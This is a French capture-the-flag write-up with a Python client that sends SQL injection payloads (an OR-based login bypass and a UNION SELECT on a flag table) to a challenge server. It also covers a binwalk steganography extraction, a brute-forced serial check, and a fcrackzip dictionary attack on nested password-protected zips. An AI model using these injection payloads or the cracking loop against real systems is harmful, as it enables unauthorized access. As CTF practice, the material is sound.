
Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !
Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 ...
Welcome on level 2 !
Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py

client.py
#encoding: utf-8
 
import socket
import sys
 
# Address of the challenge server; change this if needed.
HOST = '192.168.1.19'
# TCP port of the challenge server (the name says IP, but it is the port); change this if needed.
IP   = 8096
 
 
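def create_socket(host=None, port=None):
    """Open a TCP connection to the challenge server and return the socket.

    Args:
        host: server address; defaults to the module-level ``HOST``.
        port: server TCP port; defaults to the module-level ``IP`` (which,
            despite its name, holds the port number).

    Returns:
        A connected ``socket.socket`` with a 1 second timeout, so a silent
        server makes ``recv`` raise ``socket.timeout`` instead of hanging.

    On any failure the error is printed and the process exits with status 1.
    This is the CLI boundary of a throwaway client, so the broad catch is
    deliberate; the half-built socket is closed before exiting.
    """
    if host is None:
        host = HOST
    if port is None:
        port = IP
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((host, port))
    except Exception as e:
        if s is not None:
            s.close()
        print("Can't open socket !")
        print(e)
        sys.exit(1)
    return s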
 
 
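def test_level1():
    """Solve level 1: a SQL injection in the login/password check.

    The request is ``\\x01<login>\\x00<password>``: a one-byte level selector,
    then the two fields separated by a NUL. Both fields carry the classic
    ``" OR "1"="1`` payload: the double quote closes the string literal the
    server evidently interpolates into its SQL query (the flag comes back, so
    the input is not parameterized), and the always-true OR makes the WHERE
    clause match every row. The password additionally appends
    ``LIMIT "1" OFFSET "2`` so that a specific row of that result is returned.
    The server-side fix would be a parameterized query; this client only
    demonstrates the weakness.

    Prints the two server replies on success, otherwise the generic failure
    hint. The socket is closed on every path, including exceptions such as
    ``socket.timeout``.
    """
    print("[+] Test level1 ...")
    s = create_socket()
    try:
        login = 'admin" OR "1"="1'
        password = 'toto" OR "1"="1"  LIMIT "1" OFFSET "2'
        cmd = "\x01%s\x00%s" % (login, password)
        # sendall, not send: send may transmit only part of the payload.
        s.sendall(cmd.encode('utf-8'))
        msg = s.recv(1024)
        text = msg.decode('utf-8') if msg else ''
        if text.startswith("Welcome"):
            print(text)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        s.close()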
 
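def test_level2():
    """Solve level 2: a UNION-based SQL injection in the citation lookup.

    The request is ``\\x02<citation id>``. The id is sent as
    ``123 union SELECT * fROM flag`` so that, when the server pastes it
    unquoted into its query (the flag comes back, so it does), the rows of
    the ``flag`` table are appended to the result.

    The payload is built as ``b"\\x02" + citation.encode('utf-8')`` rather
    than ``b"\\x02%s" % citation``: the latter only works on Python 2, where
    ``b""`` is a plain str, and raises TypeError for a str argument on
    Python 3. This also matches how test_level1 encodes its request.

    Prints the two server replies on success, otherwise the generic failure
    hint. The socket is closed on every path.
    """
    print("[+] Test level2 ...")
    s = create_socket()
    try:
        citation = '123 union SELECT * fROM flag'
        s.sendall(b"\x02" + citation.encode('utf-8'))
        msg = s.recv(1024)
        text = msg.decode('utf-8') if msg else ''
        if text.startswith("Welcome"):
            print(text)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        s.close()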
 
 
 
if __name__ == '__main__':
    # Run both levels back to back, with a blank line between the two
    # transcripts so they are easy to tell apart.
    for idx, run_level in enumerate((test_level1, test_level2)):
        if idx:
            print("")
        run_level()

challenge de stegano

Il fallait trouver un fichier caché dans l'image ci-dessous. Il suffit de lancer cette commande :p et on a le flag : `binwalk --dd='.*' special-k.png` (`--dd='.*'` demande à binwalk d'extraire tous les fichiers dont il reconnaît la signature).

serial

trouver des serials qui respectent le code py suivant

serial.py
import random, string
 
def are_same(serial):
	"""Return True when any two of the first three items of *serial* are equal.

	Only indices 0, 1 and 2 are examined, left to right, short-circuiting on
	the first equal pair; a sequence shorter than three items raises
	IndexError unless an earlier pair already matched.
	"""
	return (serial[0] == serial[1]
		or serial[1] == serial[2]
		or serial[0] == serial[2])
 
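def check_serial(serial):
	"""Return True if *serial* is valid under the challenge's rules, else False.

	A valid serial is ``XXX-YYY-Z`` (exactly two dashes) where:
	  * X and Y are exactly three uppercase ASCII letters (A-Z) each, with
	    no letter repeated inside X and none repeated inside Y;
	  * the third letter of X is at least 10 code points above its second
	    (``X[2] >= X[1] + 10``) and the third letter of Y is at least 10
	    below its second (``Y[2] <= Y[1] - 10``);
	  * Z parses with ``int()``, equals the sum of the six letter code points,
	    is a multiple of 3, and the two triplets have different sums.

	Anything that is not a string, has a different number of dash-separated
	parts, or whose third part is not an integer, is rejected. The catches
	are narrowed to the exceptions those operations actually raise instead
	of a bare ``except`` that would also swallow KeyboardInterrupt/SystemExit.
	"""
	try:
		serials = serial.split('-')
	except (AttributeError, TypeError):
		# No .split at all (None, int, ...) or a bytes/str mismatch on Python 3.
		return False
	if len(serials) != 3:
		return False
	try:
		X = [ord(a) for a in serials[0]]
		Y = [ord(a) for a in serials[1]]
		Z = int(serials[2])
	except (ValueError, TypeError):
		# int() of a non-number, or ord() of something that is not a 1-char string.
		return False

	if len(X) != 3 or len(Y) != 3:
		return False

	# Uppercase ASCII only: ord('A') == 65, ord('Z') == 90.
	for a in X + Y:
		if a < 65 or a > 90:
			return False

	if are_same(X) or are_same(Y):
		return False

	if X[1] + 10 > X[2]:
		return False

	if Y[1] - 10 < Y[2]:
		return False

	sum1 = X[0] + X[1] + X[2]
	sum2 = Y[0] + Y[1] + Y[2]
	if sum1 == sum2:
		return False
	if sum1 + sum2 != Z:
		return False
	if Z % 3 != 0:
		return False
	return True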

Au lieu de chercher des valeurs à la main, j'ai bruteforcé avec ce code :

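# Random search for a valid serial. Only the two letter triplets are drawn at
# random: the numeric part is fully determined by the rules (it must equal the
# sum of the six letter code points), so it is computed rather than guessed,
# which removes the 1-in-1000 chance the original three random digits had of
# matching even when the letters were right. The loop ends at the first
# candidate check_serial accepts and prints it; print(...) works on both
# Python 2 and 3. (The unreachable exit() after break was dropped.)
while 1:
	x = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	y = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	z = str(sum(ord(c) for c in x + y))

	s = "%s-%s-%s" % (x, y, z)
	if check_serial(s):
		print(s)
		break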

Exemple de serial valide : DGR-GVH-450 (68+71+82 = 221 et 71+86+72 = 229, soit 450, qui est bien divisible par 3).

deeper

Une archive zip qui contient un zip qui contient un zip... chacun protégé par un mot de passe :/

code bash pour automatiser la tâche

run.sh
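#!/bin/bash
# Peel a chain of nested, password-protected zip archives.
#
# Usage: ./run.sh <outer.zip> [wordlist]
#   $1  the outermost archive
#   $2  wordlist for the dictionary attack (default: rockyou)
#
# Each round: confirm the current file is a zip, recover its password with
# fcrackzip (-D dictionary mode, -u verifies candidates by really unzipping),
# extract it, and continue with the extracted member. Stops at the first
# non-zip file (the payload) or when no password is found.

file=$1
wordlist=${2:-/usr/share/wordlists/rockyou.txt}
count=1

if [ -z "$file" ]; then
	echo "usage: $0 <archive.zip> [wordlist]" >&2
	exit 1
fi

while true; do
	echo "test $count : $file"
	# All expansions are quoted: member names may contain spaces.
	if ! file "$file" | grep 'Zip'; then
		break
	fi
	echo "ZIP ok"
	r=$(fcrackzip -D -u -p "$wordlist" "$file")
	# fcrackzip reports "PASSWORD FOUND!!!!: pw == <password>"; keep what follows "== ".
	pass=$(printf '%s\n' "$r" | awk -F'== ' '/pw ==/ {print $2; exit}')
	if [ -z "$pass" ]; then
		echo "no password found for $file with $wordlist, stopping" >&2
		exit 1
	fi
	echo "pass is : $pass"
	# unzip prints "  inflating: <name>  " with trailing blanks; strip them so
	# the quoted "$file" on the next round is the real name. -o avoids an
	# interactive overwrite prompt stalling the loop on a re-run.
	file=$(unzip -o -P "$pass" "$file" | awk -F': ' '/extracting|inflating/ {sub(/[[:space:]]+$/, "", $2); print $2; exit}')
	echo "new file [$file]"
	if [ -z "$file" ]; then
		echo "extraction produced no file, stopping" >&2
		exit 1
	fi
	count=$((count + 1))
done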

output

root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start 
test 1 : 8KLifFpoUdbxXB5noGIG.zip.start
8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : AC020307
new file [6TF2INzK1as0vC4hmGVW.zip  ]
test 2 : 6TF2INzK1as0vC4hmGVW.zip  
6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : tiagia4
new file [BYJrsoCOfTlWehfvNoBU.zip  ]
test 3 : BYJrsoCOfTlWehfvNoBU.zip  
BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : jesipato
new file [uBKIeGWEztQN7FwsSr6b.zip  ]
test 4 : uBKIeGWEztQN7FwsSr6b.zip  
uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : benk2007benk
new file [exhNdH5BI2Hr0lV99EEs.zip  ]
test 5 : exhNdH5BI2Hr0lV99EEs.zip  
exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : 02456035
...